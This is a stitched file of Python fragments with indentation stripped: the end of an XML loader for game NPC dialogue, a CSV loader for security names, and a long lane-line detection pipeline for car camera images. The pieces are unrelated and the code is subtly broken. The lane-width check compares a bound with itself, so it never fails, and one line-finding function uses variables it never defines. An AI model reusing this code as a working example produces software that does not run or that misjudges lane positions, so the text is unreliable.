linear = (xml_get_node_text(conversation, "linear") == "True")
# ...and create a basic conversation object
new_conversation = Conversation(npc_name, linear = linear)
logging.info("%s.load(): Loading Conversation for NPC '%s'...", __class__, new_conversation.owner)
# Next get a list of all of the lines
lines = conversation.getElementsByTagName("line")
# For each line...
for line in lines:
# Get the basic details of the line
text = xml_get_node_text(line, "text")
# ... and create a basic line object which we add to the owning conversation
new_line = ConversationLine(text)
new_conversation.add_line(new_line)
logging.info("%s.load(): Loading line '%s'...", __class__, new_line.text)
logging.info("%s.load(): Conversation '%s' loaded", __class__, new_conversation.owner)
# Add the new conversation to the dictionary
self._conversations[new_conversation.owner] = new_conversation
self._dom.unlink()
|
"""Reads the given csv file into a list of strings containing the names of the securities."""
import csv
import os
def load(file):
assert os.path.isfile(file)
with open(file) as f:
reader = csv.reader(f)
return next(reader)
|
import os
import datetime
import glob
import pickle
import numpy as np
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import matplotlib.lines as mlines
from matplotlib.path import Path
import matplotlib.patches as patches
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
# helper functions
def log(stage, msg):
'''
function to print out logging statement in this format:
format
<time> : <stage> : <msg>
example:
2017-04-28 12:48:45 : info : chess board corners found in image calibration20.jpg
'''
print(str(datetime.datetime.now()).split('.')[0] + " : " + stage + " : " + msg)
def writeImage(item, dir, basename, cmap=None):
'''
write an image(s) to file
fig: matplotlib figure or image as an numpy array
filePath: path to write the image to
'''
# create dir if nonexistent
if not os.path.isdir(dir):
log('info', 'creating output directory: ' + dir)
os.mkdir(dir)
# if numpy array - write it
#if type ==
# define filename
file = dir + '/' + basename + '.png'
log('info', 'writing image: ' + file)
# if ndarray
if isinstance(item, np.ndarray):
if len(item.shape) == 1:
fig = plt.figure(1)
ax = plt.axes()
plt.plot(item)
fig.savefig(file)
else:
mpimg.imsave(file, item, cmap=cmap)
else:
fig = item
fig.savefig(file)
plt.clf()
def laneLinePipeline(rgb, mtx, dist, outDir, retNr, leftLine, rightLine, format, sobel_kernel=5, mag_sobelxy_thresh=(70, 100), hls_thresh=(120, 255), lab_thresh=(160, 255), luv_thresh=(200, 255)):
'''
processes an image from input to output in finding a lane line
img: input image in bgr colorspace
mtx: camera calibration matrix
dist: camera distortion coefficients
outDir: output directory path
retNr: return the result of a certain step of the pipeline
leftLine: tracking instance for the left line
rightLine: tracking instance for the right line
format: normal|collage4|collage9 for creating collages
sobel_kernel: size of the sobel kernel
mag_sobelxy_thresh: tuple of min and max threshold for the binary generation
return: image with detected-lanes-overlay
'''
# store for the intermediate steps of the processing pipeline
imageBank = {}
imageBank[0] = rgb
if retNr is 0:
return rgb
###############################
#
# STEP 1: UNDISTORT IMAGE
#
###############################
rgb_undistort = cv2.undistort(rgb, mtx, dist, None, mtx)
imageBank[1] = rgb_undistort
if retNr is 1:
return rgb_undistort, leftLine, rightLine
###############################
#
# STEP 2: CREATE A GRAYSCALE VERSION OF THE UNDISTORTED IMAGE
#
###############################
gray = cv2.cvtColor(rgb_undistort, cv2.COLOR_RGB2GRAY)
gray_as_rgb = cv2.cvtColor(gray, cv2.COLOR_GRAY2RGB)
imageBank[2] = gray_as_rgb
if retNr is 2:
return gray_as_rgb, leftLine, rightLine
# ###############################
# #
# # STEP 3: CREATE A BINARY MASK OF THE MAGNITUDE SOBEL-XY-OPERATOR
# #
# ###############################
# binary_output_abs_sobelxy = getBinaryMagSobelXY(gray, sobel_kernel, mag_sobelxy_thresh)
# binary_output_abs_sobelxy_as_rgb = cv2.cvtColor(binary_output_abs_sobelxy * 255, cv2.COLOR_GRAY2RGB)
# imageBank[3] = binary_output_abs_sobelxy_as_rgb
# if retNr is 3:
# return binary_output_abs_sobelxy_as_rgb, leftLine, rightLine
# ###############################
# #
# # STEP 4: CREATE A BINARY MASK OF THE S OF THE HLS COLORSPACE VERSION
# #
# ###############################
# binary_output_s_of_hls = getBinarySHls(rgb_undistort, hls_thresh)
# binary_output_s_of_hls_as_rgb = cv2.cvtColor(binary_output_s_of_hls * 255, cv2.COLOR_GRAY2RGB)
# imageBank[4] = binary_output_s_of_hls_as_rgb
# if retNr is 4:
# return binary_output_s_of_hls_as_rgb, leftLine, rightLine
###############################
#
# STEP 3: CREATE A BINARY MASK OF THE B OF THE LAB COLORSPACE VERSION
#
###############################
binary_output_b_of_lab = getBinaryBLab(rgb_undistort, lab_thresh)
binary_output_b_of_lab_as_rgb = cv2.cvtColor(binary_output_b_of_lab * 255, cv2.COLOR_GRAY2RGB)
imageBank[3] = binary_output_b_of_lab_as_rgb
if retNr is 3:
return binary_output_b_of_lab_as_rgb, leftLine, rightLine
###############################
#
# STEP 4: CREATE A BINARY MASK OF THE L OF THE LUV COLORSPACE VERSION
#
###############################
binary_output_l_of_luv = getBinaryLLuv(rgb_undistort, luv_thresh)
binary_output_l_of_luv_as_rgb = cv2.cvtColor(binary_output_l_of_luv * 255, cv2.COLOR_GRAY2RGB)
imageBank[4] = binary_output_l_of_luv_as_rgb
if retNr is 4:
return binary_output_l_of_luv_as_rgb, leftLine, rightLine
###############################
#
# STEP 5: COMBINE THE TWO BINARY MASKS IN ONE IMAGE
#
###############################
binary_combined = combineBinaries([binary_output_b_of_lab, binary_output_l_of_luv])
binary_combined_as_rgb = cv2.cvtColor(binary_combined * 255, cv2.COLOR_GRAY2RGB)
imageBank[5] = binary_combined_as_rgb
if retNr is 5:
return binary_combined_as_rgb, leftLine, rightLine
###############################
#
# STEP 6,7,8: WARP THE COMBINED BINARY MASK TO BIRDS EYE VIEW
#
###############################
binary_combined_warped, figs, M, Minv = transformToBirdsView(binary_combined)
figs[0].canvas.draw() # draw the canvas, cache the renderer
tmp = np.fromstring(figs[0].canvas.tostring_rgb(), dtype=np.uint8, sep='')
unwarped_binary_with_polygon = cv2.resize(tmp.reshape(figs[0].canvas.get_width_height()[::-1] + (3,)), (rgb_undistort.shape[1], rgb_undistort.shape[0]))
imageBank[6] = unwarped_binary_with_polygon
if retNr is 6:
return unwarped_binary_with_polygon, leftLine, rightLine
figs[1].canvas.draw() # draw the canvas, cache the renderer
tmp = np.fromstring(figs[1].canvas.tostring_rgb(), dtype=np.uint8, sep='')
warped_binary_with_polygon = cv2.resize(tmp.reshape(figs[1].canvas.get_width_height()[::-1] + (3,)), (rgb_undistort.shape[1], rgb_undistort.shape[0]))
imageBank[7] = warped_binary_with_polygon
if retNr is 7:
return warped_binary_with_polygon, leftLine, rightLine
binary_combined_warped_as_rgb = cv2.cvtColor(binary_combined_warped * 255, cv2.COLOR_GRAY2RGB)
imageBank[8] = binary_combined_warped_as_rgb
if retNr is 8:
return binary_combined_warped_as_rgb, leftLine, rightLine
###############################
#
# STEP 9: CREATE A HISTOGRAM OF THE LOWER HALF OF THE COMBINED BINARY MASK
#
###############################
# take a histogram along all the columns in the lower half of the image
histogram = np.sum(binary_combined_warped[binary_combined_warped.shape[0]//2:, :], axis=0)
plt.clf()
fig = plt.figure(1)
ax = plt.axes()
plt.plot(histogram)
fig.canvas.draw()
tmp = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
histogram_as_rgb = cv2.resize(tmp.reshape(fig.canvas.get_width_height()[::-1] + (3,)), (rgb_undistort.shape[1], rgb_undistort.shape[0]))
imageBank[9] = histogram_as_rgb
if retNr is 9:
return histogram_as_rgb, leftLine, rightLine
# calc lane width
widthMeter = calcLaneWidth(leftLine, rightLine)
###############################
#
# STEP 10: DETECT LANE LINES AND CREATE A POLYFIT 2ND ORDER
#
###############################
if leftLine.isDetected() and rightLine.isDetected() and isLaneWidthPlausible(widthMeter):
# if False:
detected_or_sliding_window, left_poly_coeff, right_poly_coeff = findLinesSimple(binary_combined_warped, leftLine.getBestPolyCoeff(), rightLine.getBestPolyCoeff())
else:
# finding the lines with sliding window
detected_or_sliding_window, left_poly_coeff, right_poly_coeff = findLines(binary_combined_warped)
imageBank[10] = detected_or_sliding_window
if retNr is 10:
return detected_or_sliding_window, leftLine, rightLine
# if one line is faulty recognized and jumps
left_poly_coeff_smooth, right_poly_coeff_smooth, correctionStatement = smoothPolyCoeff(leftLine, rightLine, left_poly_coeff, right_poly_coeff)
# set the coeffs
leftLine.setDetected(True)
rightLine.setDetected(True)
leftLine.setCurrentPolyCoeff(left_poly_coeff_smooth)
rightLine.setCurrentPolyCoeff(right_poly_coeff_smooth)
# generate x-y-values for plotting the lines
left_line_x, right_line_x, both_lines_y = generateLineXYValues(rgb, leftLine.getBestPolyCoeff(), rightLine.getBestPolyCoeff())
# calculate radius of lane
leftRadiusMeter, rightRadiusMeter = calcRadius(left_line_x, right_line_x, both_lines_y)
leftLine.setRadiusOfCurvature(leftRadiusMeter)
rightLine.setRadiusOfCurvature(rightRadiusMeter)
###############################
#
# STEP 11: DRAW POLYFITTED LINES AND LANE TO UNDISTORTED IMAGE
#
###############################
# draw the polyfitted lines on undistorted original image
polyfit_on_undistorted = drawPolyfitOnImage(rgb_undistort, binary_combined_warped, Minv, left_line_x, right_line_x, both_lines_y)
imageBank[11] = polyfit_on_undistorted
if retNr is 11:
return polyfit_on_undistorted, leftLine, rightLine
# calc the deviation of the lane center of vehicle
vehicleCenterDeviation = calcVehicleDeviation(left_line_x, right_line_x, both_lines_y)
leftLine.setLineBasePos(vehicleCenterDeviation)
rightLine.setLineBasePos(vehicleCenterDeviation)
###############################
#
# STEP 12: WRITE ADDITIONAL DATA ONTO IMAGE
#
###############################
# write text on image
resultImage = writeText(polyfit_on_undistorted, (leftRadiusMeter+rightRadiusMeter)/2, vehicleCenterDeviation, widthMeter, correctionStatement)
imageBank[12] = resultImage
if retNr is 12:
return resultImage, leftLine, rightLine
if format == 'collage4':
return genCollage(4, imageBank), leftLine, rightLine
elif format == 'collage9':
return genCollage(9, imageBank), leftLine, rightLine
return resultImage, leftLine, rightLine
def genCollage(amount, imageBank):
'''
generating a 2x2 or 3x3 collage
amount: 4 -> 2x2 collage; 9 _> 3x3 collage
return: imageCollage
'''
resultImage = None
if amount == 4:
row1 = cv2.hconcat((imageBank[1], imageBank[5]))
row2 = cv2.hconcat((imageBank[10], imageBank[12]))
resultImage = cv2.vconcat((row1, row2))
resultImage = cv2.resize(resultImage, (1920, int((1920/resultImage.shape[1]) * resultImage.shape[0])))
elif amount == 9:
row1 = cv2.hconcat((imageBank[1], imageBank[2], imageBank[4]))
row2 = cv2.hconcat((imageBank[5], imageBank[6], imageBank[8]))
row3 = cv2.hconcat((imageBank[9], imageBank[10], imageBank[12]))
resultImage = cv2.vconcat((row1, row2, row3))
resultImage = cv2.resize(resultImage, (1920, int((1920/resultImage.shape[1]) * resultImage.shape[0])))
return resultImage
def calcVehicleDeviation(left_poly_x, right_poly_x, poly_y):
'''
calculating the deviation of vehicle of the center of the lane
leftx: x-values for the left line
rightx: x-values for the right line
return: deviationMeters (neg => left of center, pos => right of center)
'''
# the distance of the left and right polyline in pixels
lineDistancePixels = right_poly_x[-1] - left_poly_x[-1]
#print('lineDistancePixels', lineDistancePixels)
# the center of the lane in Pixels
laneCenterAtPixel = left_poly_x[-1] + lineDistancePixels/2
#print('laneCenterAtPixel', laneCenterAtPixel)
# the position of the vehicle (camera) in pixels
cameraCenterOfImg = 1280/2
#print('cameraCenterOfImg', cameraCenterOfImg)
# deviation of the vehicle from the lane center in pixels
deviationInPixels = cameraCenterOfImg - laneCenterAtPixel
#print('deviationInPixels', deviationInPixels)
# if lane is 3.7 wide, how many meter is 1 pixel
metersPerPixel = 3.7 / lineDistancePixels
#print('metersPerPixel', metersPerPixel)
# the deviation in meters
deviationOfVehicleFromLaneCenterMeter = metersPerPixel * deviationInPixels
#print('deviationOfVehicleFromLaneCenterMeter', deviationOfVehicleFromLaneCenterMeter)
return deviationOfVehicleFromLaneCenterMeter
def calcLaneWidth(leftLine, rightLine):
'''
calculate lane width in meters
leftLine: data of left line
rightLine: data of right line
return: lane width
'''
if leftLine.getX() and rightLine.getX():
# x_px_per_meter = 700/3.7
# laneWidthMeter = 3.7
x_meter_per_px = 3.7/700
actualLaneWidthPixel = rightLine.getX() - leftLine.getX()
return actualLaneWidthPixel * x_meter_per_px
return False
def isLaneWidthPlausible(widthMeter):
'''
determine whether lane width is plausible.
widthMeter: width in meter
return: bool if lane width is plausible
'''
result = False
lowerBoundMeter = 3
upperBoundMeter = 4.5
if not widthMeter:
return False
if widthMeter < lowerBoundMeter or upperBoundMeter > upperBoundMeter:
result = False
else:
result = True
# print('isLaneWidthPlausible:', result)
return result
def writeText(img, curvatureMeter, vehicleCenterDeviation, laneWidth, correctionStatement):
'''
writes the lane curvature onto the image
img: image
curvatureMeter: the curvature in meters
return: image_with_text
'''
font = cv2.FONT_HERSHEY_SIMPLEX
dir = 'right'
if vehicleCenterDeviation < 0:
dir = 'left'
cv2.putText(img, 'Radius of Curvature = '+str(int(curvatureMeter))+'m', (50, 50), font, 0.8, (0, 255, 0), 2, cv2.LINE_AA)
cv2.putText(img, 'Vehicle is '+'{:4.2f}'.format(abs(vehicleCenterDeviation))+'m '+dir+' of center', (50, 80), font, 0.8, (0, 255, 0), 2, cv2.LINE_AA)
# cv2.putText(img, correctionStatement, (50, 110), font, 0.8, (0, 255, 0), 2, cv2.LINE_AA)
# if laneWidth != None:
# cv2.putText(img, 'Lane Width is '+'{:4.2f}'.format(laneWidth)+'m ', (50, 140), font, 0.8, (0, 255, 0), 2, cv2.LINE_AA)
return img
def calcRadius(leftx, rightx, ploty):
'''
calculate the radius of the left and the right line
leftx: x-values for the left line
rightx: x-values for the right line
ploty: y-values for both lines
return: leftRadius, rightRadius
'''
# Generate some fake data to represent lane-line pixels
# ploty = np.linspace(0, 719, num=720)# to cover same y-range as image
# quadratic_coeff = 3e-4 # arbitrary quadratic coefficient
# For each y position generate random x position within +/-50 pix
# of the line base position in each case (x=200 for left, and x=900 for right)
# leftx = np.array([200 + (y**2)*quadratic_coeff + np.random.randint(-50, high=51)
# for y in ploty])
# rightx = np.array([900 + (y**2)*quadratic_coeff + np.random.randint(-50, high=51)
# for y in ploty])
leftx = leftx[::-1] # Reverse to match top-to-bottom in y
rightx = rightx[::-1] # Reverse to match top-to-bottom in y
# Fit a second order polynomial to pixel positions in each fake lane line
left_fit = np.polyfit(ploty, leftx, 2)
left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]
right_fit = np.polyfit(ploty, rightx, 2)
right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]
# Plot up the fake data
mark_size = 3
plt.plot(leftx, ploty, 'o', color='red', markersize=mark_size)
plt.plot(rightx, ploty, 'o', color='blue', markersize=mark_size)
plt.xlim(0, 1280)
plt.ylim(0, 720)
plt.plot(left_fitx, ploty, color='green', linewidth=3)
plt.plot(right_fitx, ploty, color='green', linewidth=3)
plt.gca().invert_yaxis() # to visualize as we do the images
# Define y-value where we want radius of curvature
# I'll choose the maximum y-value, corresponding to the bottom of the image
y_eval = np.max(ploty)
left_curverad = ((1 + (2*left_fit[0]*y_eval + left_fit[1])**2)**1.5) / np.absolute(2*left_fit[0])
right_curverad = ((1 + (2*right_fit[0]*y_eval + right_fit[1])**2)**1.5) / np.absolute(2*right_fit[0])
#print(left_curverad, right_curverad)
# Example values: 1926.74 1908.48
# Define conversions in x and y from pixels space to meters
ym_per_pix = 30/720 # meters per pixel in y dimension
xm_per_pix = 3.7/700 # meters per pixel in x dimension
# Fit new polynomials to x,y in world space
left_fit_cr = np.polyfit(ploty*ym_per_pix, leftx*xm_per_pix, 2)
right_fit_cr = np.polyfit(ploty*ym_per_pix, rightx*xm_per_pix, 2)
# Calculate the new radii of curvature
left_curverad = ((1 + (2*left_fit_cr[0]*y_eval*ym_per_pix + left_fit_cr[1])**2)**1.5) / np.absolute(2*left_fit_cr[0])
right_curverad = ((1 + (2*right_fit_cr[0]*y_eval*ym_per_pix + right_fit_cr[1])**2)**1.5) / np.absolute(2*right_fit_cr[0])
# Now our radius of curvature is in meters
#print(left_curverad, 'm', right_curverad, 'm')
# Example values: 632.1 m 626.2 m
return left_curverad, right_curverad
def drawPolyfitOnImage(undistorted, warped, Minv, left_fitx, right_fitx, ploty):
'''
draws the polyfit lines as a binary image
sampleOneChannelImage: to sample the shape from for the target image
left_poly_x: x-values for the left line
right_poly_x: x-values for the right line
poly_y: y-values for both lines
return: binary mask of the polyfit lines
'''
# Create an image to draw the lines on
warp_zero = np.zeros_like(warped).astype(np.uint8)
color_warp = np.dstack((warp_zero, warp_zero, warp_zero))
# Recast the x and y points into usable format for cv2.fillPoly()
pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])
pts = np.hstack((pts_left, pts_right))
# Draw the lane onto the warped blank image
cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))
# Warp the blank back to original image space using inverse perspective matrix (Minv)
newwarp = cv2.warpPerspective(color_warp, Minv, (undistorted.shape[1], undistorted.shape[0]))
# Combine the result with the original image
result = cv2.addWeighted(undistorted, 1, newwarp, 0.3, 0)
return result
def drawPolyfit(sampleOneChannelImage, left_poly_x, right_poly_x, poly_y):
'''
draws the polyfit lines as a binary image
sampleOneChannelImage: to sample the shape from for the target image
left_poly_x: x-values for the left line
right_poly_x: x-values for the right line
poly_y: y-values for both lines
return: binary mask of the polyfit lines
'''
# create an empty image with the same spacial shape of the source image, but with 1 color channel
polyfit_binary = np.zeros_like(sampleOneChannelImage)
# create binary
for i in range(len(poly_y)):
for x_between in range(int(left_poly_x[i]), int(right_poly_x[i])):
polyfit_binary[int(poly_y[i])][int(left_poly_x[i]):int(right_poly_x[i])] = 1
return polyfit_binary
def generateLineXYValues(sampleImage, left_poly_coeff, right_poly_coeff):
'''
generate x and y values from polyfit coefficients
sampleImage: sample image of right shape
left_poly_coeff: polyfit coefficients for the left line
right_poly_coeff: polyfit coefficients for the right line
return: left_x, right_x, plot_y
'''
# Generate x and y values for plotting
ploty = np.linspace(0, sampleImage.shape[0]-1, sampleImage.shape[0] )
left_fitx = left_poly_coeff[0]*ploty**2 + left_poly_coeff[1]*ploty + left_poly_coeff[2]
right_fitx = right_poly_coeff[0]*ploty**2 + right_poly_coeff[1]*ploty + right_poly_coeff[2]
return left_fitx, right_fitx, ploty
def smoothPolyCoeff(leftLine, rightLine, left_poly_coeff, right_poly_coeff):
'''
if one polyfit jumps and the other remains pretty much the same as in the last timestep
the jumping one will be substituted by a parallel copy of the steady one
'''
statement = "no correction"
if (len(leftLine.getRecentPolyCoeff()) > 0):
# print('full coeffs:', left_poly_coeff)
# print('3rd coeffs:', left_poly_coeff[2])
# print('full recent coeffs:', leftLine.getRecentPolyCoeff()[-1])
# print('3rd coeffs:', leftLine.getRecentPolyCoeff()[-1][2])
leftChangePx = left_poly_coeff[2] - leftLine.getRecentPolyCoeff()[-1][2]
rightChangePx = right_poly_coeff[2] - rightLine.getRecentPolyCoeff()[-1][2]
# print('change of left line:', leftChangePx)
# print('change of right line:', rightChangePx)
# if the lines are diverging
if leftChangePx - rightChangePx > 100:
# print('ITs A JUMP!')
# the line with the biggest change is considered faulty
if abs(leftChangePx) > abs(rightChangePx):
# left line faulty
# overwrite the faulty left poly coeffs with the poly coeffs of the right
# print('left is faulty')
left_poly_coeff = leftLine.getBestPolyCoeff()
# get the 3rd coeff of last frame
# left_poly_coeff[2] = leftLine.getRecentPolyCoeff()[-1][2]
# overwrite the 1st and 2nd coeff with the values of the right line
# left_poly_coeff[0] = right_poly_coeff[0]
# left_poly_coeff[1] = right_poly_coeff[1]
statement = "left is faulty - will be corrected"
else:
# right is faulty
# print('right is faulty')
right_poly_coeff = rightLine.getBestPolyCoeff()
# get the coeffs of last frame
# right_poly_coeff[2] = rightLine.getRecentPolyCoeff()[-1][2]
# overwrite the 1st and 2nd coeff with the values of the left line
# right_poly_coeff[0] = left_poly_coeff[0]
# right_poly_coeff[1] = left_poly_coeff[1]
statement = "right is faulty - will be corrected"
return left_poly_coeff, right_poly_coeff, statement
def findLinesSimple(binary_warped, left_fit, right_fit):
'''
searches for lines near the region where it has found lines in last frame
binary_warped: binary image from birds eye view
left_fit: polynomial coefficients of the left line
right_fit: polynomial coefficients of the right line
return: left_line_x, right_line_x, both_lines_y
'''
# Assume you now have a new warped binary image
# from the next frame of video (also called "binary_warped")
# It's now much easier to find line pixels!
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
margin = 100
left_lane_inds = ((nonzerox > (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy + left_fit[2] - margin)) & (nonzerox < (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy + left_fit[2] + margin)))
right_lane_inds = ((nonzerox > (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy + right_fit[2] - margin)) & (nonzerox < (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy + right_fit[2] + margin)))
# Again, extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
# Fit a second order polynomial to each
left_fit = np.polyfit(lefty, leftx, 2)
right_fit = np.polyfit(righty, rightx, 2)
# # Generate x and y values for plotting
# ploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0] )
# left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]
# right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]
# Create an output image to draw on and visualize the result
out_img = np.dstack((binary_warped, binary_warped, binary_warped))*255
for i in range(0, ploty):
out_img[ploty[i], left_fitx[i]:right_fitx[i]] = [0, 0, 255]
return out_img, left_fit, right_fit
def findLines(binary_warped):
'''
searches for lines
binary_warped: binary image from birds eye view
return: image_with_sliding_windows, polyfit_left_x, polyfit_right_x, polyfit_y
'''
# Assuming you have created a warped binary image called "binary_warped"
# Take a histogram of the bottom half of the image
histogram = np.sum(binary_warped[binary_warped.shape[0]//2:,:], axis=0)
# Create an output image to draw on and visualize the result
out_img = np.dstack((binary_warped, binary_warped, binary_warped))*255
# Find the peak of the left and right halves of the histogram
# These will be the starting point for the left and right lines
midpoint = np.int(histogram.shape[0]/2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:]) + midpoint
# Choose the number of sliding windows
nwindows = 9
# Set height of windows
window_height = np.int(binary_warped.shape[0]/nwindows)
# Identify the x and y positions of all nonzero pixels in the image
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
# Current positions to be updated for each window
leftx_current = leftx_base
rightx_current = rightx_base
# Set the width of the windows +/- margin
margin = 100
# Set minimum number of pixels found to recenter window
minpix = 50
# Create empty lists to receive left and right lane pixel indices
left_lane_inds = []
right_lane_inds = []
# Step through the windows one by one
for window in range(nwindows):
# Identify window boundaries in x and y (and right and left)
win_y_low = binary_warped.shape[0] - (window+1)*window_height
win_y_high = binary_warped.shape[0] - window*window_height
win_xleft_low = leftx_current - margin
win_xleft_high = leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
# Draw the windows on the visualization image
cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0), 2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0), 2)
# Identify the nonzero pixels in x and y within the window
good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0]
# Append these indices to the lists
left_lane_inds.append(good_left_inds)
right_lane_inds.append(good_right_inds)
# If you found > minpix pixels, recenter next window on their mean position
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
# Concatenate the arrays of indices
left_lane_inds = np.concatenate(left_lane_inds)
right_lane_inds = np.concatenate(right_lane_inds)
# Extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
# Fit a second order polynomial to each
left_fit = np.polyfit(lefty, leftx, 2)
right_fit = np.polyfit(righty, rightx, 2)
# visualize it
# # Generate x and y values for plotting
# ploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0] )
# left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]
# right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]
out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]
out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]
# plt.clf()
# plt.imshow(out_img)
# plt.plot(left_fitx, ploty, color='yellow')
# plt.plot(right_fitx, ploty, color='yellow')
# plt.xlim(0, 1280)
# plt.ylim(720, 0)
return out_img, left_fit, right_fit
def transformToBirdsView(img):
'''
transforms an image from a front facing camera to birds-eye-view
the transformation is made by a fixed source -> destination mapping that has been measured from sample photos with straight lane lines
img: input image
return warped image
'''
# define source points
src_xindent_lower = 200
src_xindent_upper = 595
src_yindent_upper = 460
# define source points for transformation
src = np.float32( [[ src_xindent_lower, img.shape[0] ], # left lower corner
[ img.shape[1]-src_xindent_lower, img.shape[0] ], # right lower corner
[ img.shape[1]-src_xindent_upper, src_yindent_upper ], # right upper corner
[ src_xindent_upper, src_yindent_upper ] ] ) # left upper corner
# define destination points
dst_xindent_lower = 300
# define destination points for transformation
dst = np.float32( [[ dst_xindent_lower, img.shape[0] ], # left lower corner
[ img.shape[1]-dst_xindent_lower, img.shape[0] ],# right lower corner
[ img.shape[1]-dst_xindent_lower, 0 ], # right upper corner
[ dst_xindent_lower, 0 ] ] ) # left upper corner
# visualize source points
fig,ax = plt.subplots(1)
ax.imshow(img)
verts = np.copy(src)
# print(verts.shape)
verts = np.vstack([verts, verts[0]])
codes = [ Path.MOVETO,
Path.LINETO,
Path.LINETO,
Path.LINETO,
Path.CLOSEPOLY,
]
path = Path(verts, codes)
patch = patches.PathPatch(path, edgecolor='r', facecolor='none', lw=2)
ax.add_patch(patch)
# plt.show()
# create transformation matrix
M = cv2.getPerspectiveTransform(src, dst)
Minv = cv2.getPerspectiveTransform(dst, src)
img_size = (img.shape[1], img.shape[0])
# transformation
warped = cv2.warpPerspective(img, M, img_size, flags=cv2.INTER_LINEAR)
# show result
fig2, ax2 = plt.subplots(1)
ax2.imshow(warped)
# plot dst points on image
verts2 = np.copy(dst)
# print(verts2.shape)
verts2 = np.vstack([verts2, verts2[0]])
path = Path(verts2, codes)
patch = patches.PathPatch(path, edgecolor='r', facecolor='none', lw=2)
ax2.add_patch(patch)
# plt.show()
# plt.clf()
return warped, [fig, fig2], M, Minv
def combineBinaries(listBinaries):
'''
combines 2 binaries to a single one
listBinaries: list of 2 binaries
'''
# Stack each channel to view their individual contributions in green and blue respectively
color_binary = np.dstack(( np.zeros_like(listBinaries[0]), listBinaries[0], listBinaries[1]))
combined_binary = np.zeros_like(listBinaries[0])
combined_binary[(listBinaries[0] == 1) | (listBinaries[1] == 1)] = 1
return combined_binary
def getBinarySHls(rgb, s_thresh):
'''
isolates the s channel of HLS colorspace and creates a thresholded binary
rgb: input image in RGB colorspace
s_thresh: tuple of min and max threshold for the binary generation
return: binary image of the thresholded s channel of an image in HLS colorspace
'''
# 1) Convert to HLS color space
hls = cv2.cvtColor(rgb, cv2.COLOR_RGB2HLS)
# 2) Apply a threshold to the S channel
S = hls[:,:,2]
binary_output = np.zeros_like(S)
binary_output[(S > s_thresh[0]) & (S <= s_thresh[1])] = 1
# 3) Return a binary image of threshold result
return binary_output
def getBinaryBLab(rgb, b_thresh):
'''
isolates the b channel of LAB colorspace and creates a thresholded binary
rgb: input image in RGB colorspace
b_thresh: tuple of min and max threshold for the binary generation
return: binary image of the thresholded b channel of an image in LAB colorspace
'''
# 1) Convert to LAB color space
lab = cv2.cvtColor(rgb, cv2.COLOR_RGB2LAB)
# 2) Apply a threshold to the B channel
B = lab[:,:,2]
binary_output = np.zeros_like(B)
binary_output[(B > b_thresh[0]) & (B <= b_thresh[1])] = 1
# 3) Return a binary image of threshold result
return binary_output
def getBinaryLLuv(rgb, l_thresh):
'''
isolates the l channel of LUV colorspace and creates a thresholded binary
rgb: input image in RGB colorspace
l_thresh: tuple of min and max threshold for the binary generation
return: binary image of the thresholded l channel of an image in LUV colorspace
'''
# 1) Convert to LUV color space
luv = cv2.cvtColor(rgb, cv2.COLOR_RGB2LUV)
# 2) Apply a threshold to the L channel
L = luv[:,:,0]
binary_output = np.zeros_like(L)
binary_output[(L > l_thresh[0]) & (L <= l_thresh[1])] = 1
# 3) Return a binary image of threshold result
return binary_output
def getBinaryMagSobelXY(gray, sobel_kernel, mag_sobelxy_thresh):
'''
calculates the magnitude of sobel and creates a thresholded binary
gray: input image in grayscale
sobel_kernel: size of the sobel kernel
mag_sobelxy_thresh: tuple of min and max threshold for the binary generation
return: binary image of the thresholded magnitude sobelxy operator
'''
# 2) Take the gradient in x and y separately
sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)
sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)
# 3) Calculate the magnitude
abs_sobelxy = np.sqrt(np.square(sobelx) + np.square(sobely))
# 4) Scale to 8-bit (0 - 255) and convert to type = np.uint8
